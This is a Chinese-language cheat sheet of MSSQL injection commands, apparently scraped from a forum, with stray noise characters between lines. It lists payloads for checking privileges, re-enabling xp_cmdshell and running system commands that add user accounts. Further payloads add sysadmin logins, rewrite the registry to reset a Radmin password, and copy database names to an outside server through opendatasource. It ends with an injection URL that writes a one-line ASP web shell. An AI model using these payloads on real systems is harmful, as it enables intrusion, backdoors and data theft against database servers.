阿Ｄ常用的一些注入命令

admin

阿Ｄ常用的一些注入命令
6 T2 L0 C. r2 Z) |/ L2 M. W//看看是什么权限的
- d3 ~' g. S! `/ ]and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

4 @! L  _  G1 t3 K2 S3 v( R3 f' T; {! E! K//检测是否有读取某数据库的权限
2 ?! N* S( l6 qand 1= (Select HAS_DBACCESS('master'))
) g) R; s1 N6 W( a* ^And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
% u0 H* ?* l2 F2 N6 ]6 l

/ e/ p. Z4 {  l9 {; g5 u数字类型
. k: B4 w9 e) U+ wand char(124)%2Buser%2Bchar(124)=0

# C# Z! f$ j; k8 Y5 s. g5 s. o字符类型
1 W: E) ~% u$ q. T6 x' K0 z( \1 m: R' and char(124)%2Buser%2Bchar(124)=0 and ''='
/ {' A3 V- y$ k
% a- v; F9 A+ @  k9 B- \搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='

爆用户名
and user>0
' and user>0 and ''='
/ l+ e. `6 f+ y) ?' O- _9 q% w! T4 o+ E* N
检测是否为SA权限
6 p3 D& O2 y: F. Mand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

! y" P8 z- P( B检测是不是MSSQL数据库
5 X* v2 V! x& N& Gand exists (select * from sysobjects);--

检测是否支持多行
7 ]$ `; g- o2 P, t; S;declare @d int;--

' z! `+ C( r( s/ \# C* r& Z恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
6 I) H0 b& T2 b7 A5 K& K, H, {! K5 Q
# U# ~  m1 g4 K5 O0 L; k  q9 _
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
# t& O9 t* h. g! f* |) h) ]
% J( s; J1 R6 p* E5 d7 U//-----------------------
; \# K) X4 ]" U5 R% l//      执行命令
//-----------------------
首先开启沙盘模式：
1 y, [  N$ f1 B" p5 x; @3 Xexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

然后利用jet.oledb执行系统命令
6 J0 I# D6 ^" w0 t4 kselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

执行命令
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
3 q. V! F$ j: @5 G
. X/ R2 p1 _$ l" p0 R5 hEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
; Q7 f" D1 `7 W) x  R
判断xp_cmdshell扩展存储过程是否存在：
! F! A6 B. n% t- Rhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
4 B8 s& Y% m2 p, P6 l
写注册表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

REG_SZ
* }. f+ v) ~; Y' I; r" y
读注册表
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
# z% P: Y, X# }5 o1 G0 n5 k# a
读取目录内容
exec master..xp_dirtree 'c:\winnt\system32\',1,1


数据库备份
backup database pubs to disk = 'c:\123.bak'

* x; e1 E0 \  p3 ], \' T//爆出长度
8 _1 e' T6 y) u! WAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--

3 Z/ A2 h* b' F9 W2 I' Z6 }$ P
5 m8 l6 S$ K: U6 z: J) Y
* @, r# q% ]/ u- U8 P+ b  B9 z) F更改sa口令方法：用sql综合利用工具连接后，执行命令：
exec sp_password NULL,'新密码','sa'

添加和删除一个SA权限的用户test：
, [, M4 P3 M. Nexec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin

/ `  N% K) o1 Q& N: Z- {删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'
9 V- ~  x& s7 N5 ?3 ^; l1 n' S
. h/ F9 a" Z# _8 G添加扩展存储过过程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
( L5 j4 k( _: J) KGRANT exec On xp_proxiedadata TO public
5 }! R2 B0 v" f& @. C# D
$ n6 B3 X9 b0 U
) {& W) {( U  `停掉或激活某个服务。

* l9 ^' B, K8 g' U% f9 @5 N7 Bexec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'

9 v& _- d6 ?4 ^$ n) X5 Vdbo.xp_subdirs
4 @2 x+ c: B; {  s
3 R4 ?# `9 \2 k# x只列某个目录下的子目录。
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
4 O3 D- h' }2 B) Q+ _$ X: S3 Y
dbo.xp_makecab

) q! Q( s7 p8 B. O将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。

3 {( L0 m- ?' K6 G& F5 V6 Gdbo.xp_makecab
'c:\test.cab','mszip',1,
, i- c- B  E9 j5 h6 u6 \'C:\Inetpub\wwwroot\SQLInject\login.asp',
6 T4 _6 F; s$ Z! I4 P'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

xp_terminate_process
1 T9 \: U8 P( l4 ~' G& Y
停掉某个执行中的程序，但赋予的参数是 Process ID。
) Z! b! Z. e  y+ Y利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID

' E7 |- g( b2 j3 ~  pxp_terminate_process 2484

xp_unpackcab
6 G9 n/ i( l* q
% h' |* ?( _4 b2 m" v% d2 G$ ]- W解开压缩档。

# j6 ~. c' P$ W5 ~3 Z) fxp_unpackcab 'c:\test.cab','c:\temp',1
* |4 {5 \$ A6 Z6 \. Y9 Z

5 k$ c2 X* v$ [) {+ x" d某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234

( ^5 k) M; n4 Y6 ccreate database lcx;
Create TABLE ku(name nvarchar(256) null);
& ]. B0 k7 _. F, `2 `7 L* W- E# k, @8 F- ]Create TABLE biao(id int NULL,name nvarchar(256) null);
% `7 \1 D0 V' P4 m
! G" p8 Z* c! N4 A# ^; z* H//得到数据库名
3 b3 N4 R' _* P' y# m/ f2 w4 qinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
% w8 A8 S/ X6 {% G

//在Master中创建表，看看权限怎样
7 ^# d* }( X! j) C6 H; ~$ Y) VCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--

用 sp_makewebtask直接在web目录里写入一句话马：
5 e+ X6 e& q0 d' ]  ~; k8 khttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
7 @4 J' d, l# B) a4 [6 A
/ c1 D/ N8 A& M, g+ J//更新表内容
7 v8 I$ [- P; c/ s' s! v& vUpdate films SET kind = 'Dramatic' Where id = 123

4 }! z& B# ]2 R! F//删除内容
delete from table_name where Stockid = 3